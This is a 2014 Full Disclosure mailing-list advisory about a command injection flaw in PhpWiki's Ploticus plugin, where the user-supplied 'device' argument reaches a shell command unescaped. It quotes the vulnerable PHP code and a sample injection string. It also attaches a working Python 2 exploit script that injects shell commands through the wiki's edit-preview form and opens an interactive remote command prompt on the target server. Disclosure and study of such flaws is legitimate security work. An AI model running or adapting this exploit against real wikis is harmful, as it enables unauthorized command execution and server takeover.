
List:       full-disclosure
Subject:    [FD] PHP-Wiki Command Injection
From:       "Benjamin Harris" <bch () hush ! ai>
Date:       2014-08-27 22:23:45
Message-ID: 20140827222345.2D3DEC0112 () smtp ! hushmail ! com

Hi All

OSS-Security, can I get a CVE for this please?

URL: https://sourceforge.net/projects/phpwiki/

I tried to report this a month ago, but got no response from the 
developers. This is an old vulnerability I found while dusting off 
some old hard drives.

Brief:
-------------------------

PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site 
where anyone can edit the pages through an HTML form. Multiple 
storage backends, dynamic hyperlinking, themeable, scriptable by 
plugins, full authentication, ACLs.


Details:
--------------------------

Straight command injection in the Ploticus module. Attached is a 
working POC.

I found these notes I made:

<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt= 
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned


Vulnerable code, with the shell execution at the bottom. The controllable parameter is $args: the user-supplied 'device' value is interpolated into it, and from there into the command string, with no escaping or validation visible.
           $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

['device'] is an option supplied by the user when invoking the Ploticus 
plugin.


Example usage:
 <?plugin Ploticus device||=png [ploticus options...]
     multiline ploticus script ...
  ?>

:>> 

   function getImage($dbi, $argarray, $request) {
        //extract($this->getArgs($argstr, $request));
        //extract($argarray);
        $source =& $this->source;
        if (!empty($source)) {
            if ($this->withShellCommand($source)) {
                $this->_errortext .= _("shell commands not allowed 
in Ploticus");
                return false;
            }
            if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
                $src = "#proc getdata\ndata:";
                $i = 0;
                foreach ($argarray['data'] as $data) {
                    // hash or array?
                    if (is_array($data))
                        $src .= ("\t" . join(" ", $data) . "\n");
                    else
                        $src .= ("\t" . '"' . $data . '" ' . $i++ . 
"\n");
                }
                $src .= $source;
                $source = $src;
            }
            $tempfile = $this->tempnam('Ploticus','plo');
            @unlink($tempfile);
            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
            if (!empty($argarray['-csmap'])) {
                    $args .= " -csmap -mapfile $tempfile.map";
                    $this->_mapfile = "$tempfile.map";
            }
            if (!empty($argarray['-prefab'])) {
                    //check $_ENV['PLOTICUS_PREFABS'] and default 
directory
                global $HTTP_ENV_VARS;
                if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
                    if (file_exists("/usr/share/ploticus"))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
"/usr/share/ploticus";
                    elseif (defined('PLOTICUS_PREFABS'))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
constant('PLOTICUS_PREFABS');
                }
                    $args .= (" -prefab " . $argarray['-prefab']);
            }
            if (isWindows()) {
                $fp = fopen("$tempfile.plo", "w");
                fwrite ($fp, $source);
                fclose($fp);
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

Many thanks,
Ben
["release.py" (text/x-python)]

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################

import urllib
import urllib2
import sys
def banner():
	"""Print the tool's ASCII-art banner to stdout (Python 2 ``print`` statement)."""
	banner_lines = (
		"	    ____                    __                  _ __   _ ",
		"	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)",
		"	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / ",
		"	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  ",
		"	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   ",
		"	             /_/ /_/         /_/                     \n",
	)
	for banner_line in banner_lines:
		print banner_line


def usage():
	"""Show the banner followed by a one-line invocation example built from argv[0]."""
	banner()
	print "	[+] Usage example"
	print "	[-] python %s http://path.to/wiki" % sys.argv[0]

# The first positional argument is the base URL of the target wiki; without it,
# print the usage text and stop (``quit`` is the site builtin here).
try:
	domain = sys.argv[1]
except IndexError:
	usage()
	quit()
def commandexec(cmd):
	"""Send *cmd* through the Ploticus ``device`` argument of an edit-preview request and return its output.

	The form data sets ``action=edit`` and ``edit[preview]`` on page ``HeIp`` (capital I,
	presumably chosen to look like the stock ``Help`` page); the injected ``echo`` calls
	bracket the command's stderr with ``123:::`` / ``:::123`` markers so the response
	body can be sliced down to just that output.  *cmd* is inserted into the payload
	without any quoting.  Python 2 only (``urllib2``).
	"""
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo \
123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= \
>>'),('edit[preview]','Preview'),('action','edit')])  cmd1 = urllib2.Request(domain \
> > +'/index.php/HeIp',data)
	# NOTE(review): the four lines above look mangled by mail-archive wrapping (a second
	# statement on the same line, stray "> >" quote markers); the original presumably had
	# the ``urllib2.Request(domain + '/index.php/HeIp', data)`` call on its own line.
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	# Locate the marker pair in the returned page and keep only what lies between them.
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]


banner()
# Two fixed probes, then an interactive prompt; each entry is passed to commandexec() as-is.
print commandexec('uname -a')
print commandexec('id')
# NOTE(review): ``quit`` is the site builtin until the assignment inside the loop rebinds it
# to 1, so the condition holds only because that builtin object never compares equal to 1.
# Shadowing a builtin as a loop flag is fragile; a plain ``break`` would express the same intent.
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

